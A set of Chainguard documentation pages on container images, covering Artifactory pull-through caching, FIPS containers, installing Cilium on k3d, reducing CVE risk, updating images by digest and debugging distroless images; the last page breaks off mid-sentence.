belonging to your organization. This mirror can then serve as a pull through cache for your Chainguard Containers. This tutorial outlines how to set up remote repositories with JFrog Artifactory. Specifically, it will walk you through how to set up one repository you can use as a pull through cache for Chainguard’s public Starter Containers and another you can use with Production Containers originating from a private Chainguard repository. It will also outline how you can use one of Artifactory’s virtual repositories as a pull through cache. Prerequisites In order to complete this tutorial, you will need the following: Administrative privileges over an Artifactory instance. If you’re interested in testing out this configuration, you can set up a trial instance on the JFrog Artifactory landing page. Administrative privileges in Chainguard. chainctl, Chainguard’s command line interface tool, installed on your local machine. To set this up, follow our installation guide for chainctl. Lastly, part of this guide assumes you have access to a private registry provided by Chainguard containing one or more Production container images. If you don’t already have access to these, you can contact our sales team. Setting Up Artifactory as a pull through for Starter Containers Chainguard’s Starter Containers are free to use, publicly available, and always represent versions tagged as :latest. To set up a remote repository in Artifactory from which you can pull Chainguard Starter Containers, log in to the JFrog platform. Once there, click on the Administration tab near the top of the screen and select Repositories from the left-hand navigation menu. On the Repositories page, click the Create a Repository button and select the Remote option. Next, you’ll need to select the type of repository to set up. For the purposes of this guide, select Docker. Following that, you can enter the following details for your new remote repository in the Basic configuration tab: Repository Key — This is used to refer to your repository. You can choose whatever name you like here, but this guide’s examples will use the name cgr-public. URL — This must be set to https://cgr.dev/. Include Patterns — Ensure that you use the default value (**/*) in this field. Lastly, in the Advanced configuration tab, ensure that the Block Mismatching Mime Types option is checked, as it should be by default. Following that, click the Create Remote Repository button. If everything worked as expected, a modal window will appear letting you know that the repository was created successfully. You can click the Set Up Docker Client button at the bottom of this window to retrieve the commands you’ll use to test that you can pull images through this repository. Testing pull through of a Chainguard Starter Container After clicking the Set Up Docker Client button, a modal window will appear from the right side of the page. Click the Generate Token & Create Instructions button, which will generate two code blocks whose contents you can copy. The first will be a docker login command similar to the following example. Run the following command in your terminal: docker login -u<linky@chainguard.dev> <myproject>.jfrog.io After running this command, you’ll be prompted to enter a password. Copy the token from the second code block and paste it into your terminal. After running the docker login command, you will be able to pull a Chainguard Starter Container through Artifactory. The following example pulls the go container image: docker pull <myproject>.jfrog.io/cgr-public/chainguard/go Be sure the docker pull command you run includes the name of your project as well as your own repository key in place of cgr-public. Setting Up Artifactory as a pull through for Production Containers Production Chainguard Containers are enterprise-ready container images that come with patch SLAs and features such as Federal Information Processing Standard (FIPS) readiness. The process for setting up an Artifactory repository that you can use as a pull through cache for Chainguard Production Containers is similar to the one outlined previously for Starter Containers, but with a few extra steps. To get started, you will need to create a pull token for your organization’s registry. Pull tokens are longer-lived tokens that can be used to pull Containers from other environments that don’t support OIDC, such as some CI environments, Kubernetes clusters, or with registry mirroring tools like Artifactory. To create a pull token with chainctl, run the following command: chainctl auth configure-docker --pull-token --parent <organization> Be sure to replace <organization> with your organization’s name or ID. Note: You can find your organization’s name or ID by running chainctl iam organizations list -o table. This command will return a docker login command like the following: . . . docker login "cgr.dev" --username "<pull_token_ID>" --password "<password>" Take note of the values for <pull_token_ID> and <password> as you’ll need these credentials when you configure a new remote Artifactory repository for pulling through Production Containers. After noting your credentials, you can begin setting up an Artifactory repository from which you can pull Chainguard Production Containers. This process is similar to the one outlined previously for setting up an Artifactory repository. Create another repository and again select the Remote option. Also, be sure to once again choose Docker as the type of remote repository you want to set up. Enter the following details for your new remote repository in the Basic configuration tab: Repository Key — Again, you can choose whatever name you like here, but this guide’s examples will use the name cgr-private. URL — This must be set to https://cgr.dev/. User Name — Enter the <pull_token_ID> value you noted down from the docker login command Password / Access Token — Enter the <password> value you noted down from the docker login command Include Patterns — Ensure that you use the default value (**/*) in this field. Lastly, in the Advanced configuration tab, ensure that the Block Mismatching Mime Types option is checked. Again, this should be the default. Following that, click the Create Remote Repository button. If everything worked as expected, a modal window will appear letting you know that the repository was created successfully. You can click the Set Up Docker Client button at the bottom of this window to retrieve the commands you’ll use to test that you can pull images through this repository. Testing pull through of a Chainguard Production container image After clicking the Set Up Docker Client button, a modal window will appear from the right side of the page. Click the Generate Token & Create Instructions button, which will generate two code blocks. The first will be a docker login command similar to the following example. Copy this command and run it in your terminal: docker login -u<linky@chainguard.dev> <myproject>.jfrog.io Be sure to include your own username and Artifactory instance. After running this command, you’ll be prompted to enter a password. Copy the token from the second code block, paste it into your terminal, and press ENTER. After running the docker login command, you will be able to pull a Chainguard Production Containers through Artifactory. The following example will pull the chainguard-base image if your organization has access to it: docker pull <myproject>.jfrog.io/cgr-private/<example.com>/chainguard-base:latest Be sure the docker pull command you run includes the name of your Artifactory project and the name of your organization’s registry. Additionally, if you entered a different repository key in the setup section, use it in place of cgr-private. Setting Up an Artifactory Virtual Repository as a Pull Through Cache Artifactory allows you to create what it refers to as virtual repositories. A virtual repository is a collection of one or more repositories (such as local, remote, or other virtual repositories) that have the same package type. The benefit of this is that you can access resources from multiple locations using a single logical URL. You can also use a virtual repository as a pull through cache. To illustrate create a new virtual repository. From the Repositories tab, click the Create a Repository button. This time, select the Virtual option and then Docker. On the New Virtual Repository page, enter a key of your choosing into the Repository Key field. Again, you can enter whatever you’d like here, but for this guide we will refer to this repository as cg-virt. Next, you must select existing repositories to include within this virtual repository. To keep things simple, we will use the cg-public and cg-private repositories created previously. Select your repositories by clicking their respective checkboxes. Then be sure to click the right-pointing chevron to move them to the Selected Repositories column. Finally, click the Create Virtual Repository button. As before, a modal window will appear letting you know that the repository was created successfully. Click the Set Up Docker Client button at the bottom of this window to retrieve the docker login command and password you’ll need to test whether you can pull Containers through this repository. Testing pull through with a virtual repository After clicking the Set Up Docker Client button, a modal window will appear from the right side of the page. Again, click the Generate Token & Create Instructions button to generate two code blocks. The first will be a docker login command similar to the following example. Copy this command and run it in your terminal: docker login -u<linky@chainguard.dev> <myproject>.jfrog.io Be sure to include your own username and Artifactory instance. After running this command, you’ll be prompted to enter a password. Copy the token from the second code block, paste it into your terminal, and press ENTER. After running the docker login command, you will be able to pull Chainguard Containers through Artifactory. To pull a public image, you would run a command like the following example which will download the public mariadb image: docker pull <myproject>.jfrog.io/cgr-virt/chainguard/mariadb:latest To pull a Production Containers, you would replace chainguard with the name of your organization’s registry. The following example will pull the chainguard-base image if your organization has access to it: docker pull <myproject>.jfrog.io/cgr-virt/<example.com>/chainguard-base:latest Be sure the docker pull command you run includes the name of your Artifactory project and the name of your organization’s registry. Also, be sure to enter your own repository key if you entered a different one in place of cgr-virt. Debugging pull through from Chainguard’s registry to Artifactory If you run into issues when trying to pull Containers from Chainguard’s Registry to Artifactory, please ensure the following requirements are met: Ensure that all Containers network requirements are met. Regarding networking, if you attempt to pull a non-existing image via pull-through, Artifactory will also make calls to chainguard.dev and www.chainguard.dev. Calls to these domains should not occur when pulling a valid image. When configuring a remote Artifactory repository, ensure that the URL field is set to https://cgr.dev/. This field must not contain additional components. You can troubleshoot by running docker login from another node (using the Artifactory pull token credentials) and try pulling an Containers from cgr.dev/chainguard/<image name> or cgr.dev/<company domain>/<image name>. It may help to clear the Artifactory cache. It could be that your Artifactory repository was misconfigured. In this case, create and configure a new Remote Artifactory repository to test with. Learn more If you haven’t already done so, you may find it useful to review our Registry Overview to learn more about Chainguard’s registry. You can also learn more about Chainguard Containers by referring to our Containers documentation. If you’d like to learn more about JFrog Artifactory, we encourage you to refer to the official Artifactory documentation. --- ### Chainguard FIPS Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/features/fips/fips-images/ Last Modified: May 24, 2025 Tags: Chainguard Containers, Product, FIPS What is FIPS? One of the primary requirements of federal compliance frameworks — including FedRAMP — is to use FIPS-validated cryptography. To help customers meet these requirements, Chainguard offers FIPS-enabled versions of many images. This article provides a high-level overview of what FIPS is, what to expect from Chainguard FIPS Containers, featuring a kernel-independent design, and how Chainguard FIPS images stand out from alternatives. Federal Information Processing Standards (FIPS) are publicly announced standards developed by the National Institute of Standards and Technology (NIST) in accordance with the Federal Information Security Management Act (FISMA) and approved by the Secretary of Commerce. FIPS compliance ensures that cryptographic security services within applications meet strict security and integrity standards, and are implemented and configured correctly. What To Expect from Chainguard FIPS Containers ‍Chainguard warranties are listed on the FIPS Commitment page. It also includes tables of relevant certifications as well as SBOM indicators of package names and versions. Chainguard Kernel-Independent FIPS Containers Cryptographic protection relies on the secure implementation of a trusted algorithm and a random bit generator that cannot be reasonably predicted at any greater accuracy than random chance. Traditionally, to achieve this compliance requirement, developers were required to provision dedicated hardware and VMs with the host kernel configured in FIPS mode. This is because containers historically accessed the entropy source provided by a certified kernel. In cloud native or shared environments, this requirement significantly increased operational complexity by forcing a dependence on a limited set of FIPS-enabled kernels. Chainguard FIPS Containers remove this friction with a novel design that replaces a kernel entropy source with a userspace one. This implementation enables developers to deploy FIPS workloads using any of the latest kernels, hardware, and instance types. Chainguard FIPS Containers thus unlock the ability to run FIPS workloads on developer machines, existing CI/CD deployments, and even on readily available non-FIPS managed cloud offerings. All this can be done using the latest userspace runtimes like NodeJS, Python, Go, PHP, .NET, and C/C++, among others. Under Chainguard’s novel design, the container image for a given FIPS application can be entirely self-contained, minimal, and distroless. Note: There are some workloads that require a kernel SP 800-90B entropy source or a kernel FIPS module. These include but are not limited to Chainguard FIPS container images shipping Java, k8s CNI plugins, LUKS2 full-disk encryption, and StrongSwan VPN. These use cases will continue to require a kernel in FIPS mode. Read our full blog about Chainguard’s Kernel-Independent FIPS Containers. Developer Guidance for Available FIPS Containers Additional guidance is available for specific container images, like these: go-fips node-fips jdk-fips You can find a full list Chainguard FIPS Containers at: https://images.chainguard.dev/?category=fips. All of Chainguard’s FIPS Containers have STIGs. ‍Chainguard will take commercially reasonable efforts to ensure applications utilize FIPS-validated cryptographic modules for any cryptographic operations, provided that the parties acknowledge and agree that certain behaviors or functionalities within such applications, which are beyond the direct control of Chainguard, may not fully adhere to FIPS requirements. In the event there are common vulnerabilities and exposures identified, the Chainguard SLA will apply. ‍If Customer requests an image not currently available as a Chainguard FIPS Container, Chainguard will use commercially reasonable efforts to determine if such request is feasible. For further information, contact fips-contact@chainguard.dev. Learn more We encourage you to check our list of FIPS Containers in the Chainguard Containers Directory. After navigating to the directory, you can either click the FIPS tag in the left-hand sidebar menu to filter out any non-FIPS Containers, or use the search function to find every container image with “fips” in its name. Additionally, we encourage you to check out the documentation for the OpenSSL FIPS module and the Bouncy Castle FIPS Crypto package to better understand how they work. Chainguard’s FIPS Containers are not included in our free tier of Starter container images. If you’d like access to one or more of our FIPS-ready container images, please contact us. --- ### Getting Started with the Cilium Chainguard Containers URL: https://edu.chainguard.dev/chainguard/chainguard-images/getting-started/cilium/ Last Modified: March 22, 2025 Tags: Chainguard Containers, Product Cilium is open source software for transparently securing the network connectivity between application services deployed using Linux container management platforms like Docker and Kubernetes. At the foundation of Cilium is a new Linux kernel technology called eBPF, which enables the dynamic insertion of powerful security visibility and control logic within Linux itself. Because eBPF runs inside the Linux kernel, Cilium security policies can be applied and updated without any changes to the application code or container configuration. Chainguard offers a set of minimal, security-hardened Cilium container images, built on top the Wolfi OS. We will demonstrate how to get started with the Chainguard Cilium container images on an example K3s cluster. To get started, you’ll need Docker, k3d (a CLI tool to install k3s), kubectl, and the cilium CLI installed. Docker k3d kubectl cilium CLI Note: In November 2024, after this article was first written, Chainguard made changes to its free tier of container images. In order to access the non-free container images used in this guide, you will need to be part of an organization that has access to them. For a full list of container images that will remain in Chainguard's free tier, please refer to this support page. What is Wolfi Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. Chainguard Containers Chainguard Containers are a mix of distroless and development container images based on Wolfi. Daily builds make sure images are up-to-date with the latest package versions and patches from upstream Wolfi. Start up a K3s cluster Cilium does not work with the default Container Network Interface (CNI) plugin in K3s, so we’ll start up a CNI for our K3s cluster and disable the network policy. To do so, create a YAML manifest named k3d.yaml with the following command: cat > k3d.yaml <<EOF apiVersion: k3d.io/v1alpha5 kind: Simple image: cgr.dev/chainguard/k3s:latest servers: 1 options: k3s: extraArgs: # Cilium requires network policy and CNI to be turned off - arg: --disable-network-policy nodeFilters: - server:* - arg: --flannel-backend=none nodeFilters: - server:* EOF Then, we’ll start up the cluster: k3d cluster create --config k3d.yaml If cluster creation fails with errors, check that Docker is running. Next, Cilium requires some system mounts for the nodes. Run the following command to configure the mounts: for node in $(kubectl get nodes -o jsonpath='{.items[*].metadata.name}'); do echo "Configuring mounts for $node" docker exec -i $node /bin/sh <<-EOF mount bpffs -t bpf /sys/fs/bpf mount --make-shared /sys/fs/bpf mkdir -p /run/cilium/cgroupv2 mount -t cgroup2 none /run/cilium/cgroupv2 mount --make-shared /run/cilium/cgroupv2/ EOF done For more information, refer to the settings suggested in the Cilium documentation. With that, you’re ready to install Cilium. Install Cilium using Chainguard Containers We will use the Cilium CLI to install Cilium. In order to use Chainguard Containers, we must first set the following values: export ORGANIZATION=<your-Chainguard-organization> export AGENT_IMAGE=cgr.dev/$ORGANIZATION/cilium-agent:latest export HUBBLE_RELAY_IMAGE=cgr.dev/$ORGANIZATION/cilium-hubble-relay:latest export HUBBLE_UI_IMAGE=cgr.dev/$ORGANIZATION/cilium-hubble-ui:latest export HUBBLE_UI_BACKEND_IMAGE=cgr.dev/$ORGANIZATION/cilium-hubble-ui-backend:latest export OPERATOR_IMAGE=cgr.dev/$ORGANIZATION/cilium-operator-generic:latest Note: If you don’t remember the name of your Chainguard organization, you can find it by running chainctl iam organizations list -o table. After that, install Cilium using the following command: cilium install \ --helm-set hubble.relay.enabled=true \ --helm-set hubble.ui.enabled=true \ --helm-set image.override=$AGENT_IMAGE \ --helm-set hubble.relay.image.override=$HUBBLE_RELAY_IMAGE \ --helm-set hubble.ui.frontend.image.override=$HUBBLE_UI_IMAGE \ --helm-set hubble.ui.backend.image.override=$HUBBLE_UI_BACKEND_IMAGE \ --helm-set operator.image.override=$OPERATOR_IMAGE This will return output similar to the following: 🔮 Auto-detected Kubernetes kind: K3s ℹ️ Using Cilium version 1.14.2 🔮 Auto-detected cluster name: k3d-k3s-default Now that your cluster has a CNI plugin installed, the Pods will start to transition to the Running state. This may take a few minutes. Run the following command to check the status of the Pods: watch kubectl get pods --all-namespaces When all the Pods have have a status of Running or Completed, press Ctrl+C to exit the watch. Verify that the Cilium installation is successful Cilium comes with the connectivity test command, which is useful for verifying whether the Cilium installation was successful. Run the following command to run the connectivity test: # We skip one of the tests because it needs `jq` util on the agent image, which we don't bundle. cilium connectivity test \ --external-cidr 8.0.0.0/8 \ --external-ip 8.8.8.8 \ --external-other-ip 8.8.4.4 \ --test \!no-unexpected-packet-drops This should takes about 5 minutes to complete. It will return output similar to the following: ℹ️ Single-node environment detected, enabling single-node connectivity test ℹ️ Monitor aggregation detected, will skip some flow validation steps ✨ [k3d-k3s-default] Creating namespace cilium-test for connectivity check... ✨ [k3d-k3s-default] Deploying echo-same-node service... ✨ [k3d-k3s-default] Deploying DNS test server configmap... ✨ [k3d-k3s-default] Deploying same-node deployment... ✨ [k3d-k3s-default] Deploying client deployment... ✨ [k3d-k3s-default] Deploying client2 deployment... ⌛ [k3d-k3s-default] Waiting for deployment cilium-test/client to become ready... ⌛ [k3d-k3s-default] Waiting for deployment cilium-test/client2 to become ready... ... ✅ All 32 tests (263 actions) successful, 2 tests skipped, 1 scenarios skipped. Note that the exact output and results of individual tests may differ based on your local machine’s configuration. Exploring the Cilium Hubble UI Before you can explore the Hubble user interface, you will need to enable it with the cilium command: cilium hubble enable --ui Then run the following command to bring up the Hubble UI: cilium hubble ui A new browser window will open showing the Hubble UI. You can explore the Hubble UI to see the network traffic in your cluster. If you are running this during the connectivity test, it will show a visualization of the test traffic. Clean up your K3s cluster Once you are done exploring Cilium, you can clean up your K3s cluster by running the following command: k3d cluster delete Advanced Usage If your project requires a more specific set of packages that aren't included within the general-purpose Cilium Chainguard Container, you'll first need to check if the package you want is already available on the wolfi-os repository. Note: If you're building on top of a container image other than the wolfi-base container image, the image will run as a non-root user. Because of this, if you need to install packages with apk install you need to use the USER root directive. If the package is available, you can use the wolfi-base image in a Dockerfile and install what you need with apk, then use the resulting image as base for your app. Check the "Using the wolfi-base Container" section of our images quickstart guide for more information. If the packages you need are not available, you can build your own apks using melange. Please refer to this guide for more information. --- ### Strategies for Minimizing your CVE Risk URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/cve-risk/ Last Modified: March 29, 2024 Tags: Conceptual, Chainguard Containers, CVE Common vulnerabilities and exposures, often referred to as “CVEs”, are an increasing concern for both developers and consumers of software. A new CVE that appears in a widely-used application or a vulnerability scan with a large number of positive results would naturally be worrisome for developers, CISOs, and end users alike. Chances are, your software has already been impacted by a CVE. It’s likely there are active CVEs in software you are using. After all, there are software vulnerabilities currently in existence that haven’t even been discovered (known as zero-day vulnerabilities). With that said, this conceptual article aims to highlight a few practices and strategies you and your team can use to reduce the risk of CVEs on your software. It also includes a section on tools recommended by Chainguard that can help to reduce your attack surface area and minimize your risk of CVEs. Understanding potential risks An important step to minimizing your CVE risk is to understand the potential impacts and develop a sense of how CVEs can make their way into your applications. One way you can do this is to familiarize yourself with the various databases that list known CVEs and their exploitations, including the CVE Program and the Known Exploited Vulnerabilities (KEV) Catalog. It also might be helpful to stay up to date with industry news. Software vulnerabilities and attacks have gained more attention from technology journalists. For example, the Heartbleed vulnerability received widespread coverage when it was discovered in 2014, as did the Log4Shell vulnerability in 2021. Bear in mind, just keeping up to date with industry news and recent CVEs won’t prevent vulnerabilities from encroaching on your projects. After all, malicious actors could be exploiting a vulnerability in your code long before the CVE is discovered and reported. Having said that, understanding how vulnerabilities are discovered, categorized, and exploited can be useful when thinking about how to harden your system’s defenses. Another way to prepare yourself for the potential risks associated with CVEs is to have a plan in place for what you should do if new vulnerabilities affecting your software arise. It’s becoming more common for organizations to develop a playbook built out ahead of time. The Cybersecurity & Infrastructure Security Agency (CISA) recently published a Vulnerability Response Playbook. The goal of this playbook is to provide a framework for Federal Civilian Executive Branch agencies to identify and mitigate vulnerabilities. Although this playbook is meant specifically for organizations working with the federal government, the idea of having a plan in place ahead of a vulnerability is a great way to minimize the risk. Maintaining dependency hygiene Dependency hygiene is the practice of ensuring that the dependencies you introduce into your project do not contain vulnerabilities. We’ve found that many popular container images, when not updated, will accumulate about one known vulnerability per day. Many of the most widely used container images aren’t updated regularly and past academic software engineering research has found that most images on Docker Hub, the most widely used container registry, have not been updated for over 120 days. Some teams go so far as to actively avoid using dependencies, working under the belief that taking a “roll-your-own” approach to all their tooling is an effective way to reduce CVEs. Although first-party tools may report fewer CVEs when scanned, they won’t be battle-tested like widely used open-source software, meaning there are drawbacks to this approach. Recommended tools This section outlines a few categories of tools that can be useful for minimizing CVEs, and provides a few examples for each. Scanners There are a number of tools available that allow you to scan your third party code for CVEs. At Chainguard, we use Grype to scan our own Chainguard Containers, as it’s open-source and it can scan Software Bills of Materials (or SBOMs). Additionally, Grype biases towards false positives over false negatives. Looking into a vulnerability in an image that turns out to be a false positive can be preferable to overlooking a real vulnerability that impacts end users. Another open-source scanning option is Falco. Falco works with environments running in individual containers, hosts, Kubernetes, and the cloud. Falco works by collecting data from various sources — including Linux kernel syscalls, Kubernetes audit logs, and events from systems like GitHub or Okta — and compares them with a set of rules. Falco comes with a list of rules by default, but you can also create your own rules to suit the needs of your project. If any of the collected data breaks one of the rules, Falco will identify it as a security issue. Be aware that the results of a vulnerability scan can only tell you part of the story. Say, for example, that Project A has only a few dependencies while Project B has many. Logically, a vulnerability scan of Project A will likely return fewer results than one for Project B, but that doesn’t mean that Project A is at any less of a risk. Although its results might show only a few CVEs, one of these vulnerabilities could still have a serious impact on Project A. Conversely, Project B’s scan results might show a large number of CVEs, but most or all of these could be false positives. Scorecard is another scanning tool, though it isn’t specifically a vulnerability scanner. Scorecard is an automated tool from the Open Source Security Foundation that performs a variety of security checks on software, returning a score between 1 and 10 for each one. These scores can help you understand what you need to work on to improve your project’s security, and can also help you assess the security of your dependencies. For a more in-depth discussion of how scanners may fail to collect certain information, we encourage you to check out our blog post on “Software Dark Matter”. Automating updates As stated in the preceding section on dependency hygiene, out-of-date dependencies pose a serious risk to software projects. The older and more out of date a given dependency is, the more likely it is to contain vulnerabilities. Automating updates for your projects can help avoid the problems associated with outdated dependencies One tool that’s useful for automating updates for your dependencies is Dependabot. Dependabot is a free tool offered by GitHub that sends alerts to repositories affected by new vulnerabilities and — if possible — raises a pull request to update the affected dependencies. If you’d like to automate updates outside of GitHub repositories, Snyk is another tool that enables automatic updates. Synk can integrate into IDEs as well as repositories, allowing you to continuously scan for vulnerabilities. Like Dependabot, Snyk will automatically submit a pull request when it encounters a vulnerability and it can recommend a solution. There are a number of important considerations one should make when keeping container images up to date. Please check out our conceptual article on the subject. Minimal container images As mentioned previously, the fewer dependencies a given piece of software uses, the lower likelihood that it will be impacted by CVEs. To this end, Chainguard provides a library of minimal container images that can minimize your CVE risk. Chainguard Containers are distroless, meaning they contain only an application and its runtime dependencies. These images do not even contain a shell or package manager. Because Chainguard Containers minimize the number of dependencies in this manner and thus reduce the potential attack surface, they inherently contain few to zero CVEs. Also, Chainguard Containers are rebuilt nightly to ensure images are completely up-to-date and contain all available security patches, and the engineering team often fixes vulnerabilities before they’re detected. If you’re looking for a certain image that isn’t included in Chainguard’s library, you can build your own minimal container images with Wolfi, a community Linux distribution designed by Chainguard for the container and cloud-native era. Chainguard started the Wolfi project to enable building Chainguard Containers, which required a Linux distribution with components at the appropriate granularity and with support for glibc. Wolfi includes a fully declarative build system and provides a high-quality, build-time SBOM as standard for all packages. Its packages are designed to be granular and independent — in order to support minimal images — and uses the proven and reliable apk package format. Please note that as of March of 2024, Chainguard will maintain one version of each Wolfi package at a time. These track the latest version of the upstream software in the package. Chainguard does not provide patch support for previous versions of packages in Wolfi. Existing packages will not be removed from Wolfi and you may continue to use them, but be aware that older packages will no longer be updated and will accrue vulnerabilities over time. This change ensures that Chainguard can provide the most up-to-date patches to all packages for our container images users. Note that specific package versions can be made available in Production Containers, if you have a request for a specific package version, please contact support. Learn more As mentioned in the introduction, there’s no way to guarantee that no CVEs will affect your software. However, we hope that by reading this article you’ll have learned some practical tips you can use to help minimize your exposure to vulnerabilities and keep your software secure. If you’d like to learn more about CVEs, and strategies for remediating them, we encourage you to check out the following resources: What Are Software Vulnerabilities and CVEs? False Positives and False Negatives with Containers Scanners Considerations for Keeping Containers Up to Date --- ### Considerations for Keeping Containers Up to Date URL: https://edu.chainguard.dev/chainguard/chainguard-images/staying-secure/updating-images/considerations-for-image-updates/ Last Modified: October 11, 2023 Tags: Chainguard Containers, Product It is essential to keep container images up-to-date in order to receive critical security updates and leverage new features. However, updates come with a risk: any time new code is introduced, there is a chance for breaking changes or other impacts on dependent systems. Due to the complexity involved in modern containerized applications, there is no one-size-fits-all approach to keeping your container images up to date. With these conflicting approaches in mind, this article will explore how best to keep container images up-to-date. Understanding image versioning and naming conventions Before discussing image updates, it’s helpful to have a baseline understanding of how images are typically versioned and named. Semantic versioning — also known as “semver” — is a system for determining how version numbers are assigned to a given piece of software. Software using semver has versions numbered in the format of X.Y.Z. X is reserved for major versions that are backwards incompatible, Y is used for minor versions that are backward compatible, and Z is used for patches and bug fixes. As an example, for a piece of software with the version number 3.5.2, 3 is the major version, 5 is the minor version, and 2 is the patch number. Semantic versioning is intended to improve problems associated with having a large number of dependencies. Although semver has become a common practice throughout the software industry, it isn’t used universally. When referencing an image, it’s important to know exactly what image you are working with. Docker uses the following format for image names. [host]/[repository][image_name][:tag] For example, the full name for the Go Chainguard Container, is cgr.dev/chainguard/go:latest. Certain elements of this name format are optional in many cases. For instance, if you omit the hostname portion of an image name in either Docker or Kubernetes, both will default to using the public Docker registry. Automating updates One solution to avoiding out-of-date container images would be to automate the process of updating images. This may be a system that scans a container registry for new versions of a given image and updates the application any time a new version of an image is released. However, you will need to consider a few specific details around your particular software and organization’s situation prior to fully automating container image updates, as you may run into issues with breaking changes upstream. You’ll want to think through the following: What is your risk appetite: is your software part of critical infrastructure or is its function of less urgent importance? What tests do you have in place? If you have confidence in your test suite, you may have a higher risk tolerance as you’ll trust that tests will fail and prevent broken images from going live. You’ll also want to consider what exact version of an image you are updating, whether you are pinning to a digest to guarantee reproducibility, defaulting to a tag, or automating minor or patch version updates. Even with safeguards in place, there is still a risk that at some point your application will use a version of an image it’s no longer fully compatible with, and you’ll need to have a plan in place to remedy this. There are some tools that can automate some or all of the process of updating your images. One such example is watchtower, which will update the running version of your app when an appropriately tagged image is pushed to a relevant registry. Additionally, there are FluxCD and Argo CD’s Image Update tool. If you’re going to use tools like these to automate image updates, it is a recommended that you have testing and monitoring in place. Monitoring, alerting, and logging support you and your organization in making the information you need for debugging, security-related analysis, and compliance requirements available while also keeping a history of relevant data. Be mindful about tagging practices Developers will often create multiple variations of the same image. Sometimes these different images may represent distinct numbered versions of the image, or they may contain unique sets of packages. Typically, these different images in the same series will share a name and be stored in the same repository, but the developer will differentiate them by giving them different tags. In the context of containers, a tag is a human-readable identifier associated with an image. These make it easier to distinguish between different versions of images within the same repository. Oftentimes, developers will pin their project to a specific tag. As an example, imagine a project that uses an image named example_image and it is pinned to version 1.9, as in cgr.dev/chainguard/example_image:1.9. One day, version 2.0 is released, but the project developers choose not to upgrade, as doing so would introduce breaking changes. There may be situations where different tags point to the same image. For example, the first version of an image named sample_image is released with the tag 1. Later on, a minor version is released with the tag 1.2, and then even later patch is released with the tag 1.2.3. In this case, the images tagged 1 and 1.2 would point to the same image as the one tagged 1.2.3, since 1.2.3 is the latest patch of both these major and minor versions. Conversely, if the developer later decides to patch version 1.1 of the sample_image and tags it as 1.1.4, the image tagged 1 will still point to 1.2.3, as that’s the latest iteration of the most recent minor version. Many systems will default to using the latest tag in certain cases if you don’t specify one. For example, if you use Docker to build an image but don’t specify a tag, it will always default to tagging it with latest. There’s a misconception that the latest tag always represents the most recent stable version of a given image. The normal convention is for the latest tag to point to the most up-to-date stable version of the image, but it is only a convention and not an enforced rule. One of the most important features of container builds is their reproducibility as you would like to ensure that you are using the same image each time. However, container tags are mutable, meaning that they can change over time. If you pin your application to a specific image tag and then the image associated with that tag gets updated and you redeploy or pull the image again, your application will be using a different image than it was before. Eventually, the image could change to the point that it no longer works with your application. When it comes to container versions, pinning an application to a major version is usually an acceptable practice since minor version increases typically won’t break things. That being said, the potential for “jumping” across minor or major versions without warning means that pinning an application to a major or minor tag isn’t suitable for many production workflows. To avoid this problem, it’s recommended to pin projects to an image digest. A digest is a content-based hash of the image contents and is guaranteed to be immutable. Because a digest will always point to the same image, its reproducibility is guaranteed. To find the digest for an image, users can run a command like the following. docker images --digests cgr.dev/chainguard/wolfi-base REPOSITORY TAG DIGEST IMAGE ID CREATED SIZE cgr.dev/chainguard/wolfi-base latest sha256:490977f0fd3d8596d173839dbb314153797312553b43f6a24b0e341cf2e8d473 2606ed78c658 9 days ago 10.9MB To clarify, using tags to keep your images may work for you and your organization. However, if you’re concerned about ensuring reproducibility — or you just want more control over what images you’re running — using digests can be a better approach for your situation. Recommendations As mentioned in the previous section, image digests guarantee full reproducibility. For that reason, it’s generally recommended that projects update their container images by digest whenever possible. Of course, digests do come with their own drawbacks. Image digests are not human readable; unlike tags, you can’t always tell the difference between two image digests with a quick visual scan. Digests also don’t make it clear whether a digest represents an older version, or whether one digest is older than another. Combined, these factors mean that digests can make it more difficult to know whether an image is up to date. Chainguard Containers are rebuilt daily in order to ensure that they’re kept up to date and include all the latest available security patches. We recommend adopting a development pattern where digests are used to identify Chainguard Containers and are regularly updated by a bot, ensuring that the project and its downstream users benefit from reduced vulnerability counts, bug fixes, and new features. We do this ourselves with our digestabot tool. As with the recommendation stated previously, Chainguard requires a human to approve the digestabot’s update before it’s deployed. Technically, we could set up an automatic approval for the bot’s updates, but requiring a human approval combines the stability and reproducibility of using a digest with the good security hygiene of keeping images regularly updated. There are many factors to consider when developing a process for keeping your images up to date, so you’re unlikely to find useful advice on the subject beyond the general strategies outlined in this guide. Of course, different update strategies will work for different circumstances. Ultimately, whatever process you or your organization land on for keeping images up to date should suit the needs of your users without becoming a burden to you or your organization. Learn more To reiterate, there’s no one-size-fits-all approach to keeping one’s images up to date. Our goal for this article is to introduce some of the important factors one should consider when developing a container image update plan for their application. If you’d like to learn more about the subjects touched on in this guide, we encourage you to check out the following resources. How to Use Chainguard Containers How to Use Container Container Digests to Improve Reproducibility How To Compare Chainguard Containers with chainctl --- ### Debugging Distroless Container Images URL: https://edu.chainguard.dev/chainguard/chainguard-images/troubleshooting/debugging-distroless-images/ Last Modified: August 22, 2023 Tags: Chainguard Containers, Product Because distroless images are minimal and don’t include a package manager or a shell, debugging issues that occur at runtime may require a distinctive approach. In this article, we’ll discuss a few different strategies to debug distroless images. 1. Using Development Container Image Variants Before moving a workload to a distroless runtime image, it is important to make sure that it runs without issues in a similar but less restrictive environment, which allows for easier debugging. It is also possible to make a temporary base image change from a distroless image to a fully featured image that offers more debugging capabilities. The development variants of Chainguard Containers are designed to replicate the same packages of their distroless version, but with additional software that helps in developing, building, and debugging applications in different language ecosystems. These are sometimes referred to as -dev variants since they are tagged with :latest-dev. For example, the following table shows a comparison between the development variants of the PHP image, and which packages are included with each variant: latest latest-dev latest-fpm wolfi-baselayout X X X ca-certificates-bundle X X X php X X X apk-tools X bash X busybox X git X composer X php-fpm X You can find similar detailed package information for all Chainguard Containers in their respective image details pages under the SBOM section. Once you have changed your Dockerfile base image to use a development variant, you can overwrite the entry point command to get a shell on the container: docker run -it --entrypoint /bin/sh cgr.dev/chainguard/php:latest-dev Having a package manager and the ability to log into the image to debug any issues is very important at development time, but becomes unnecessary (and less safe) when talking about production environments. That’s why we recommend using a distroless variant for production workloads. Chainguard Containers in Production Although the development image variants have similar security features as their distroless versions, such as complete SBOMs and signatures, they feature additional software that is typically not necessary in production environments. The general 